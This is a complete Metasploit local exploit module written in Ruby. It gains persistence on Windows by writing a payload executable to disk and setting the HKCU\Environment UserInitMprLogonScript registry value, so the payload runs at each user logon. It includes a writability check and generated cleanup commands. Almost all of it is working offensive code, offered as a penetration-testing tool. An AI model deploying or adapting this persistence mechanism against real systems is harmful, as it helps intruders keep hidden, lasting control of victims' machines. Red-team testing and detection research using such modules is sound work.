1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::Windows::Registry
10
  include Msf::Post::File
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::Local::Persistence
13
  prepend Msf::Exploit::Remote::AutoCheck
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Windows Persistence via UserInitMprLogonScript',
20
        'Description' => %q{
21
          This module establishes persistence by setting the UserInitMprLogonScript
22
          value in HKCU\Environment. During user logon, userinit.exe checks this value
23
          and executes the specified command or binary.
24

25
          The module writes a payload executable to disk and points
26
          UserInitMprLogonScript to that payload.
27
        },
28
        'License' => MSF_LICENSE,
29
        'Author' => ['Nayera'],
30
        'Platform' => [ 'win' ],
31
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
32
        'SessionTypes' => [ 'meterpreter', 'shell' ],
33
        'Targets' => [
34
          [ 'Automatic', {} ]
35
        ],
36
        'References' => [
37
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
38
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
39
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
40
        ],
41
        'DefaultTarget' => 0,
42
        'DisclosureDate' => '2015-07-01',
43
        'Notes' => {
44
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
45
          'Stability' => [CRASH_SAFE],
46
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
47
        }
48
      )
49
    )
50

51
    register_options([
52
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
53
    ])
54
  end
55

56
  def regkey
57
    'HKCU\\Environment'
58
  end
59

60
  def check
61
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')
62

63
    return CheckCode::Safe("#{writable_dir} does not exist") unless exists?(writable_dir)
64

65
    test_name = Rex::Text.rand_text_alpha(8)
66
    test_value = Rex::Text.rand_text_alpha(8)
67
    return CheckCode::Safe("Unable to write to registry path #{regkey}") unless registry_setvaldata(regkey, test_name, test_value, 'REG_SZ')
68

69
    registry_deleteval(regkey, test_name)
70

71
    CheckCode::Vulnerable('Registry path is writable')
72
  end
73

74
  def install_persistence
75
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
76
    payload_exe = generate_payload_exe
77
    payload_pathname = "#{writable_dir}\\#{payload_name}.exe"
78

79
    vprint_good("Writing payload to #{payload_pathname}")
80
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
81

82
    old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript')
83
    registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ')
84
    print_good("Configured #{regkey}\\UserInitMprLogonScript to execute #{payload_pathname}")
85

86
    if old_value.nil?
87
      @clean_up_rc = "reg deleteval -k '#{regkey}' -v 'UserInitMprLogonScript'\n"
88
    else
89
      escaped_old_value = old_value.gsub('\\', '\\\\')
90
      @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v UserInitMprLogonScript /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
91
    end
92
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
93
  end
94
end
95

96